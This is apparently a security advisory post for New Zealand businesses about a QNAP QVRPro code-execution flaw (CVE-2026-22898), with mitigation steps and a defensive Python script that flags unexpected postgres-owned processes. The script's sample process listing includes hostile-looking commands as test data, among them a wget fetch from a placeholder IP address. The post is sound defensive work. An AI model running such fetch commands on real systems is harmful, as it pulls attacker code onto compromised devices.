QNAP NAS devices are widely deployed across New Zealand businesses for file storage, backups, and surveillance. A newly disclosed vulnerability in the TS-453E's QVRPro plugin allows unauthenticated attackers on the same network segment to execute arbitrary code — making this a priority patch for any organisation running affected hardware.

What Happened

The Zero Day Initiative has published advisory ZDI-26-292 (CVE-2026-22898), a high-severity vulnerability rated CVSS 8.8 affecting QNAP TS-453E NAS devices. The flaw sits within the QVRPro Plugin, QNAP's video surveillance software, and is classified as an "exposed dangerous method" weakness.

Exploitation does not require authentication. An attacker positioned on an adjacent network — for example, connected to the same office LAN or Wi-Fi — can trigger the vulnerability remotely and execute code in the context of the postgres user account on the device. From there, attackers typically pivot to broader system compromise, data theft, or lateral movement into connected business systems.

The vulnerability was reported to QNAP by researchers at Fuzzinglabs in January 2026 and disclosed publicly on 15 April 2026 after coordinated resolution. QNAP has released a patch alongside security advisory QSA-26-07.

Given that NAS devices frequently hold the most sensitive operational data in SMBs — financial records, client files, and surveillance footage — a code execution flaw with this attack profile represents a realistic path to ransomware deployment or data exfiltration if left unpatched.

Key Takeaways

  • CVE-2026-22898 affects QNAP TS-453E NAS devices running the QVRPro plugin.
  • CVSS score is 8.8 (High); no authentication is required to exploit.
  • Attackers must be network-adjacent — meaning access to the local network is needed, not direct internet exposure.
  • Successful exploitation yields code execution as the postgres database user.
  • QNAP has released a patch via security advisory QSA-26-07.
  • NAS devices exposed to untrusted networks or guest Wi-Fi are at elevated risk.

What NZ Businesses Should Do

  1. Patch immediately. Apply the QNAP firmware and QVRPro plugin updates referenced in QSA-26-07. If you manage NAS devices for clients, prioritise this in your next maintenance window.
  2. Audit your QNAP fleet. Identify all TS-453E units and confirm whether QVRPro is installed. If QVRPro isn't actively used, uninstall it to reduce attack surface.
  3. Segment your NAS devices. Place NAS and surveillance infrastructure on a dedicated VLAN, isolated from guest Wi-Fi, BYOD networks, and general user traffic. This limits which devices can reach the vulnerable service.
  4. Never expose NAS admin or plugin services to the internet. Use a VPN for remote access and confirm that UPnP or port forwarding rules aren't unintentionally exposing management interfaces.
  5. Verify backups are offline or immutable. A compromised NAS is a common ransomware target. Ensure at least one backup copy is air-gapped or stored with write-once protection so recovery is possible even if the primary NAS is compromised.
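Because successful exploitation runs code as the postgres user, a quick check on any unit that was reachable before patching is to look for processes owned by that account that are not database processes. The sketch below is an added example, not code from QNAP or the ZDI advisory. It assumes a procps-style `ps -eo user,pid,ppid,comm,args` listing is available, uses a constructed sample listing, and treats the allowlist of expected process names as an assumption to tune against a known-good device.

```python
# Constructed sample of `ps -eo user,pid,ppid,comm,args` output (not from a real device).
SAMPLE_PS = """\
USER       PID  PPID COMMAND         COMMAND
admin      812     1 sshd            /usr/sbin/sshd -D
postgres  2101     1 postgres        /usr/local/pgsql/bin/postgres -D /data/pg
postgres  2110  2101 postgres        postgres: checkpointer
postgres  2114  2101 postgres        postgres: walwriter
postgres  9034  2101 sh              sh -c id
postgres  9035  9034 wget            wget http://198.51.100.7/a
admin     9100   812 sh              -sh
"""

# Assumed baseline of process names normally run by the database account.
EXPECTED_COMM = {"postgres", "postmaster", "pg_ctl"}

def parse_ps(text):
    """Parse `ps -eo user,pid,ppid,comm,args` text into a list of dicts."""
    procs = []
    for line in text.splitlines()[1:]:           # skip the header row
        parts = line.split(None, 4)              # args may contain spaces
        if len(parts) < 4:
            continue                             # malformed or truncated row
        user, pid, ppid, comm = parts[:4]
        if not (pid.isdigit() and ppid.isdigit()):
            continue
        procs.append({"user": user, "pid": int(pid), "ppid": int(ppid),
                      "comm": comm, "args": parts[4] if len(parts) > 4 else ""})
    return procs

def suspicious_postgres_processes(procs, account="postgres"):
    """Return processes owned by `account` that are not expected database binaries."""
    by_pid = {p["pid"]: p for p in procs}
    findings = []
    for p in procs:
        if p["user"] != account or p["comm"] in EXPECTED_COMM:
            continue
        # Walk parent PIDs up to the first expected database process (or the root).
        chain, cur = [], p
        while cur and cur["pid"] not in chain:   # guard against PID loops
            chain.append(cur["pid"])
            if cur["comm"] in EXPECTED_COMM:
                break
            cur = by_pid.get(cur["ppid"])
        findings.append({"pid": p["pid"], "comm": p["comm"],
                         "args": p["args"], "ancestry": chain})
    return findings

if __name__ == "__main__":
    for finding in suspicious_postgres_processes(parse_ps(SAMPLE_PS)):
        print(finding)
```

A finding is a lead for investigation rather than proof of compromise; an empty result on a patched device does not rule out earlier activity.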

Source: Zero Day Initiative advisory ZDI-26-292